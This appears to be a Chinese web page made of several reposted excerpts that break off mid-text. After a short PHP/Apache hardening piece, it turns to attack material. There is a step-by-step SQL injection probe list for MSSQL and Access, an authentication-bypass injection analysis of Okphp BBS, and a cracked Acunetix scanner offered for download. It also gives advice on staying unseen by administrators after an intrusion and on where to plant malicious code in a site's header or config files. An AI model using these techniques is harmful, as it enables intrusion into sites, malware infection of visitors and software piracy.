摘自：http://www.phpchina.com/html/200806/n33079.html

 

一、Web服务器安全

 

PHP其实不过是Web服务器的一个模块功能，所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全，这样就扯远了，无穷无尽。PHP可以和各种Web服务器结合，这里也只讨论Apache。非常建议以chroot方式安装启动Apache，这样即使Apache和PHP及其脚本出现漏洞，受影响的也只有这个禁锢的系统，不会危害实际系统。但是使用chroot的Apache后，给应用也会带来一定的麻烦，比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接，这在效率上会稍微差一点。还有mail函数发送邮件也是个问题，因为php.ini里的：

 

[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com

SQL injection问题在ASP上可是闹得沸沸扬扬?当然还有不少国内外著名的PHP程序“遇难”。至于SQL injection的详情，网上的文章太多了，在此就不作介绍。

如果你网站空间的php.ini文件里的magic_quotes_gpc设成了off，那么PHP就不会在敏感字符前加上反斜杠（\），由于表单提交的内容可能含有敏感字符，如单引号（'），就导致了SQL injection的漏洞。在这种情况下，我们可以用addslashes()来解决问题，它会自动在敏感字符前添加反斜杠。

但是，上面的方法只适用于magic_quotes_gpc=Off的情况。作为一个开发者，你不知道每个用户的magic_quotes_gpc是On还是Off，如果把全部的数据都用上addslashes()，那不是“滥杀无辜”了？假如magic_quotes_gpc=On，并且又用了addslashes()函数，那让我们来看看：

 

[language=PHP]
<?php
//如果从表单提交一个变量$_POST['message']，内容为 Tom's book
//这此加入连接MySQL数据库的代码，自己写吧
//在$_POST['message']的敏感字符前加上反斜杠
$_POST['message'] = addslashes($_POST['message']);

摘自：http://www.phpchina.com/viewnews_33075.html

从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.

我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于COOKIE 欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!

首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子:假设在a.php中有这样一句代码:

1.判断是否有注入;and 1=1 ;and 1=2

 

2.初步判断是否是mssql ;and user>0

 

3.注入参数是字符'and [查询条件] and ''='

 

4.搜索时没过滤参数的'and [查询条件] and '%25'='

 

5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

 

6.猜数据库 ;and (select Count(*) from [数据库名])>0

 

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

 

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

 

9.(1)猜字段的ascii值（access）
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值（mssql）
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

摘自：http://www.inkings.cn/blog/?p=487

 

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

 

Acunetix Web Vulnerability Scanner V5.1

功能很好，很强大。就是操作界面比较复杂，需要时间摸索。

附件里是5.1版的破解文件，原版请到下面的地址去下载。
原版下载地址:http://www.skycn.com/soft/37545.html

下载好后，将破解文件放入安装文件同目录，破解后，输入任意注册码即可。经测试可以自动更新，大家爽吧！

 

 

 

下载地址：
破解补丁

摘自：http://www.inkings.cn/blog/?p=194

 

 

作者：特洛伊剑客's Blog

一.前言：

测试版本信息：Okphp BBS v1.3 开源版

由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难，尤其是注射时语句的构造方面更是个难点，本文主要是借对Okphp BBS v1.3一些文件得简单分析，来谈谈php+mysql注射语句构造方式，希望本文对你有点帮助。
　　声明：文章所有提到的"漏洞"，都没有经过测试，可能根本不存在，其实有没有漏洞并不重要，重要的是分析思路和语句构造。

 

二."漏洞"分析：

1.admin/login.php注射导致绕过身份验证漏洞：

代码：

 

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);

摘自：http://www.inkings.cn/blog/?p=249

Inking注：我喜欢query user，人比较懒，什么方便用什么，而且自己做“坏事”时从来不小心的 ^o^

 

随着网络黑客工具的简单化和傻瓜化，越来越多的网络爱好者可以通过现成的攻击工具轻松的入侵主机，然而谁也不想在管理员的眼皮底下做入侵，所以在入侵成功以后，一个很重要的事情是：你能不能确认你的行为在别人的监视之下？所以我们首先要知道管理员是不是现在正在你入侵的主机上？

如何判定管理员在线，我们要知道的是管理员是通过什么方式管理主机的：是pcanywhere、vnc、DameWar、终端服务、ipc、telnet还是本地登陆···

一、对于用第三方的控屏工具（pcanywhere、vnc、DameWar等），你只要看相应端口有没有状态为"ESTABLISHED"的连接。一个netstat -an就可以知道，如果想查看与端口相关的进程，使用Fport.exe就可以了。比如我们在一台主机上使用netstat -an发现如下的信息：
Active Connections

文章作者：Inking

个人主页：http://www.inkings.cn

 

        写这篇文章的目的主要是因为自己在为刚开的博客刷点流量时遇到了点困难，所以就花了点时间想了下这个问题，既然想了下，所以就干脆梳理出来写成文章，也许对刚刚接触这块的同志们会起到点作用吧。

        首先讲一下挂马要挂到哪里。讲到挂马，很多人会不由自主的想到“首页挂马”，一想到首页就想到index.*文件了，当然这不失为一个好办法，首页的浏览量通常是最大的，但是这绝对不是一个最优的办法。也有的人说干脆批量挂马，针对这种思想我无任何话说。我们仔细想一想，哪个东西在网站出现的概率是最大的，呵呵当然是header了（网站的最顶部，通常用于放置logo等），其次便是foot和sidebar了，按照HTML的执行顺序（从上到下），最好的办法就是挂在header里面了，所以挂马时先针对网站的特点，找一个最好的对策来进行挂马。此外像global.*、config.*这类网页文件也是一个好地方，被其他网页调用的概率极大。